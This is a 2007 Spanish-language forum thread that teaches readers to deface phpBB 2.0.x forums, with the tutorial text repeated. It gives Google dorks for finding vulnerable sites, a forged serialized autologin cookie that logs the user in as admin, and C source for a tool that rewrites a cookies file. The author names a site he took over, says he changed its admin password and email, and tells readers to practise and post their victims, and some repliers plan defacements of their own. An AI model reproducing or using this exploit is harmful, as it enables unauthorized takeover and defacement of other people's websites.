Defaceando foros phpBB 2.0.x
Defaceando foros phpBB 2.0.x
por el-MAGO el Dom Dic 02, 2007 5:13 am
- EL EXPLOIT
El codigo del exploit es este:
- MATERIALES
- ahora debemos disponer de IE [internet explorer]
- Necesitamos de esta herramienta IE cookie view:: www.nirsoft.net/utils/iecv.zip
- BUSCANDO VICTIMAS
-Bien para buscar a nuestra victima pues nada mas tipieamos esto en googe:
- "powered by phpbb 2.0.n" /foro/
- “inurl:phpBB”
cualquiera de las dos opciones vale
donde n debe estar entre 0 y 12
- CAMBIANDO LAS COOKIES
Ahora cambiamos las cookies, para ello abrimos el IE cookie view :
- Y buscamos la direccion URL de la web victima, en el panel "Web Site"
- y una vez encontrada la URL dale un click, y luego en panel "Key", dale click derecho a la cookie, y luego le das a editar
Ahora donde dice " VALUE " colocamos lo siguiente:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}
el dígito número "2" es el primer usuario , generalmente el Admin.
y el "s:1" es el número de caracteres de la ID del usuario.
Luego cierras la ventana de esa web, y la vuelves a abrir, pero ojo que tienes k abrir en la misma direccion que entraste desde google, osea k cuando entres a la web victima tienes que copiarte el link completito, para entrar despues de cerrar la ventana del IE.
- DEFACEANDO EL FORO
Cuando hayan abierto otra vez la ventana de la victima verán k apareceran ya logeados como ADMIN
Vean al final de la ventana dice: " Ir al panel de administracion " XD
Como podran ver tengo acceso a todo el foro XD
- EL ANTES Y DESPUES
ANTES
AHORA
- COMENTARIOS
La dirección de la victima es la siguiente: http://membres.lycos.fr/docup/index.php
Entren a ver antes de k el admin se de cuenta del deface ....... jajajaja no lo creo porque...
bueno personalmente vi la web y la analize, y si ustedes la ven tambien, es una web pornografia y mal diseñada, asi que le cambie la contraseña y el correo al admin, luego de unos dias posteare la contraseña para que vayan y estudien el deface a esa web.
Aunque ustedes pueden entrar y defacearla de nuevo pero.....no lo hagan con esa web, yo la hice para compartir con ustedes esa vulnerabilidad, por favor busquense otra victima.GRACIAS
ESPERO HAYA SIDO UNA BUENA GUIA, Y ESPERO K LA PRACTIQUEN
por cierto... FELIZ NAVIDAD Y PROSPERO AÑO NUEVO a todos!
El codigo del exploit es este:
- Código:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char** argv[]) {
FILE *pointer;
char contenido[10000],
cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0
%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",
cookief[9]="%22%3B%7D", cookiec[106],
cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb
%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
*pos;
int p=0, i=0;
if (argc!=2) {
printf("Usage: phpbb_exploit.exe user_id\n\n");
exit(0);
}
pointer=fopen("cookies.txt", "r");
if (pointer) {
fread(contenido, 300, 10, pointer);
fclose(pointer);
} else {
printf("The file can't be open\n");
exit(0);
}
strcpy(cookiec, cookie);
strncat(cookiec, argv[1], 6);
strcat(cookiec, cookief);
if (pos=strstr(contenido, cookiec)) {
p=pos - contenido;
while (i<92) {
if (cookie_false[i]!=NULL)
contenido[p]=cookie_false[i];
p++;
i++;
}
}
else {
printf("The file cookies.txt isn't valid for execute the
exploit or the user id is incorrect\n");
exit(0);
}
if (pointer=fopen("cookies.txt", "w")) {
fputs(contenido, pointer);
printf("Cookie modified: \n\n%s\n\n", contenido);
printf("The cookies file has overwriten... looks like the exploit has worked");
} else printf("\n\nThe file cookies.txt has not write permissions.");
return 0;
}
- MATERIALES
- ahora debemos disponer de IE [internet explorer]
- Necesitamos de esta herramienta IE cookie view:: www.nirsoft.net/utils/iecv.zip
- BUSCANDO VICTIMAS
-Bien para buscar a nuestra victima pues nada mas tipieamos esto en googe:
- "powered by phpbb 2.0.n" /foro/
- “inurl:phpBB”
cualquiera de las dos opciones vale
donde n debe estar entre 0 y 12
- CAMBIANDO LAS COOKIES
Ahora cambiamos las cookies, para ello abrimos el IE cookie view :
- Y buscamos la direccion URL de la web victima, en el panel "Web Site"
- y una vez encontrada la URL dale un click, y luego en panel "Key", dale click derecho a la cookie, y luego le das a editar
Ahora donde dice " VALUE " colocamos lo siguiente:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}
el dígito número "2" es el primer usuario , generalmente el Admin.
y el "s:1" es el número de caracteres de la ID del usuario.
Luego cierras la ventana de esa web, y la vuelves a abrir, pero ojo que tienes k abrir en la misma direccion que entraste desde google, osea k cuando entres a la web victima tienes que copiarte el link completito, para entrar despues de cerrar la ventana del IE.
- DEFACEANDO EL FORO
Cuando hayan abierto otra vez la ventana de la victima verán k apareceran ya logeados como ADMIN
Vean al final de la ventana dice: " Ir al panel de administracion " XD
Como podran ver tengo acceso a todo el foro XD
- EL ANTES Y DESPUES
ANTES
AHORA
- COMENTARIOS
La dirección de la victima es la siguiente: http://membres.lycos.fr/docup/index.php
Entren a ver antes de k el admin se de cuenta del deface ....... jajajaja no lo creo porque...
bueno personalmente vi la web y la analize, y si ustedes la ven tambien, es una web pornografia y mal diseñada, asi que le cambie la contraseña y el correo al admin, luego de unos dias posteare la contraseña para que vayan y estudien el deface a esa web.
Aunque ustedes pueden entrar y defacearla de nuevo pero.....no lo hagan con esa web, yo la hice para compartir con ustedes esa vulnerabilidad, por favor busquense otra victima.GRACIAS
ESPERO HAYA SIDO UNA BUENA GUIA, Y ESPERO K LA PRACTIQUEN
por cierto... FELIZ NAVIDAD Y PROSPERO AÑO NUEVO a todos!
Re: Defaceando foros phpBB 2.0.x
por el-MAGO el Dom Dic 02, 2007 5:21 am
Practiquen si encuentren una victima publiquenla..! 
Re: Defaceando foros phpBB 2.0.x
por Señor Montana el Dom Dic 02, 2007 9:11 pm
Espero que no lo hagan en este foro respeten
Saludos
Saludos
Re: Defaceando foros phpBB 2.0.x
por trisqel el Miér Dic 05, 2007 8:36 pm
XD pero este foro es Phpbb 3
Re: Defaceando foros phpBB 2.0.x
por calipso el Miér Ene 16, 2008 5:41 pm
no me aparece la cookie del foro que quiero defaciar, osea, COMO ago para que se agrege una coockie o la cookie que nesesito...
VA A SER MI 1ER DEFACEO
Atte. Calipso
VA A SER MI 1ER DEFACEO
Atte. Calipso
Re: Defaceando foros phpBB 2.0.x
por Ginkyoku el Lun Feb 18, 2008 11:42 pm
He intentado hacerlo con un foro, aunque imagino que debe ser dificil al ser un servicio gratuito, creacion de foros en 10 minutos...El caso es que la cockie
a:2:{s:11:"autologinid";s:1:"";s:6:"userid";i:-1;}
No parece ser la que deberia, imagino que habran arreglado esa vulnerabilidad porque pongo la linea que das en el tutorial pero me sigo conectando como visitante.
Dudo que se pueda pero no pierdo nada por preguntar.
¿Hay forma de entrar en la administracion del foro con esa cockie?
Tengo motivos mas que justificados para cerrar ese foro...
a:2:{s:11:"autologinid";s:1:"";s:6:"userid";i:-1;}
No parece ser la que deberia, imagino que habran arreglado esa vulnerabilidad porque pongo la linea que das en el tutorial pero me sigo conectando como visitante.
Dudo que se pueda pero no pierdo nada por preguntar.
¿Hay forma de entrar en la administracion del foro con esa cockie?
Tengo motivos mas que justificados para cerrar ese foro...